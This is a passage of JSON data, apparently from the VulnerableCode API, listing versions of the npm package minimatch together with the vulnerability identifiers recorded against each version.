"affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@1.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155787?format=api", "purl": "pkg:npm/minimatch@2.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/155788?format=api", "purl": "pkg:npm/minimatch@2.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/155789?format=api", "purl": "pkg:npm/minimatch@2.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/155790?format=api", "purl": "pkg:npm/minimatch@2.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/155791?format=api", "purl": "pkg:npm/minimatch@2.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/155792?format=api", "purl": "pkg:npm/minimatch@2.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/155793?format=api", "purl": "pkg:npm/minimatch@2.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/155794?format=api", "purl": "pkg:npm/minimatch@2.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/155795?format=api", "purl": "pkg:npm/minimatch@2.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/155796?format=api", "purl": "pkg:npm/minimatch@2.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/155797?format=api", "purl": "pkg:npm/minimatch@2.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@2.0.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/155798?format=api", "purl": "pkg:npm/minimatch@3.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-54ed-xy97-e7cq" }, { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-u4v3-87qk-tqb1" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/22618?format=api", "purl": "pkg:npm/minimatch@3.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/337161?format=api", "purl": "pkg:npm/minimatch@3.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/337162?format=api", "purl": "pkg:npm/minimatch@3.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" }, { "vulnerability": "VCID-v72h-ew1u-xfcz" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/79694?format=api", "purl": "pkg:npm/minimatch@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/909339?format=api", "purl": "pkg:npm/minimatch@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/909340?format=api", "purl": "pkg:npm/minimatch@3.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/909341?format=api", "purl": "pkg:npm/minimatch@3.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.0.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/909342?format=api", "purl": "pkg:npm/minimatch@3.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909343?format=api", "purl": "pkg:npm/minimatch@3.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909344?format=api", "purl": "pkg:npm/minimatch@3.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/62802?format=api", "purl": "pkg:npm/minimatch@3.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@3.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/67889?format=api", "purl": "pkg:npm/minimatch@4.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909345?format=api", "purl": "pkg:npm/minimatch@4.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909346?format=api", "purl": "pkg:npm/minimatch@4.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909347?format=api", "purl": "pkg:npm/minimatch@4.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909348?format=api", "purl": "pkg:npm/minimatch@4.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909349?format=api", "purl": "pkg:npm/minimatch@4.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909350?format=api", "purl": "pkg:npm/minimatch@4.2.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/62801?format=api", "purl": "pkg:npm/minimatch@4.2.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@4.2.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/67890?format=api", "purl": "pkg:npm/minimatch@5.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909351?format=api", "purl": "pkg:npm/minimatch@5.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909352?format=api", "purl": "pkg:npm/minimatch@5.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909353?format=api", "purl": "pkg:npm/minimatch@5.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909354?format=api", "purl": "pkg:npm/minimatch@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909355?format=api", "purl": "pkg:npm/minimatch@5.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909356?format=api", "purl": "pkg:npm/minimatch@5.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909357?format=api", "purl": "pkg:npm/minimatch@5.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/909358?format=api", "purl": "pkg:npm/minimatch@5.1.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/62799?format=api", "purl": "pkg:npm/minimatch@5.1.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@5.1.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/67891?format=api", "purl": "pkg:npm/minimatch@6.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909359?format=api", "purl": "pkg:npm/minimatch@6.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909360?format=api", "purl": "pkg:npm/minimatch@6.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909361?format=api", "purl": "pkg:npm/minimatch@6.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909362?format=api", "purl": "pkg:npm/minimatch@6.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.0.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909363?format=api", "purl": "pkg:npm/minimatch@6.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909364?format=api", "purl": "pkg:npm/minimatch@6.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909365?format=api", "purl": "pkg:npm/minimatch@6.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909366?format=api", "purl": "pkg:npm/minimatch@6.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/909367?format=api", "purl": "pkg:npm/minimatch@6.1.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/909368?format=api", "purl": "pkg:npm/minimatch@6.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/909369?format=api", "purl": "pkg:npm/minimatch@6.1.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.6" }, { "url": "http://public2.vulnerablecode.io/api/packages/909370?format=api", "purl": "pkg:npm/minimatch@6.1.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/909371?format=api", "purl": "pkg:npm/minimatch@6.1.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/909372?format=api", "purl": "pkg:npm/minimatch@6.1.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/909373?format=api", "purl": "pkg:npm/minimatch@6.1.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.1.10" }, { "url": "http://public2.vulnerablecode.io/api/packages/909374?format=api", "purl": "pkg:npm/minimatch@6.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/62798?format=api", "purl": "pkg:npm/minimatch@6.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@6.2.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/67892?format=api", "purl": "pkg:npm/minimatch@7.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909375?format=api", "purl": "pkg:npm/minimatch@7.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909376?format=api", "purl": "pkg:npm/minimatch@7.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/909377?format=api", "purl": "pkg:npm/minimatch@7.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/909378?format=api", "purl": "pkg:npm/minimatch@7.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-hzsn-68be-dkej" }, { "vulnerability": "VCID-kq3k-xr3z-z3c4" }, { "vulnerability": "VCID-q6uh-59pj-rfdp" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/minimatch@7.1.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/909379?format=api", "purl": "pkg:npm/minimatch@7.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { 